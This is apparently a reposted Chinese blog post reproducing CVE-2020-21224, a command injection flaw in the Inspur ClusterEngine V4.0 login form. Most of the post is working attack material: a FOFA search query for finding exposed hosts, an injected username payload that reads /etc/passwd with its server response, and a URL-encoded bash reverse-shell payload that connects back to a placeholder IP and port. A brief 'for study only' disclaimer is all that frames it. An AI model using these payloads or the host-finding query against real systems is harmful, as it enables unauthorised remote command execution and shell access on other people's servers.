当前位置:网站首页>浪潮ClusterEngineV4.0 远程命令执行漏洞 CVE-2020-21224

浪潮ClusterEngineV4.0 远程命令执行漏洞 CVE-2020-21224

2022-07-28 21:50:00 初岄

浪潮ClusterEngineV4.0 远程命令执行漏洞 CVE-2020-21224

此文章仅供用于学习研究,严禁用于非法用途,否则后果自负。

漏洞简介

浪潮服务器群集管理系统存在危险字符未过滤,导致远程命令执行

漏洞影响

浪潮ClusterEngineV4.0

FOFA语法

title="TSCEV4.0"

漏洞复现

登录页面如下

img

POC

POC测试(出现 root:x:0:0 则存在漏洞)
op=login&username=test`$(cat /etc/passwd)`

{"err":"/bin/sh: root:x:0:0:root:/root:/bin/bash: No such file or directory\n","exitcode":1,"out":"the user test does not exist\nerror:1\n"}

反弹shell
op=login&username=test`$(bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F{IP}}%2F{PORT}%200%3E%261)`

img

原网站

版权声明
本文为[初岄]所创,转载请带上原文链接,感谢
https://blog.csdn.net/xiTaiShen/article/details/125989764

边栏推荐

猜你喜欢

随机推荐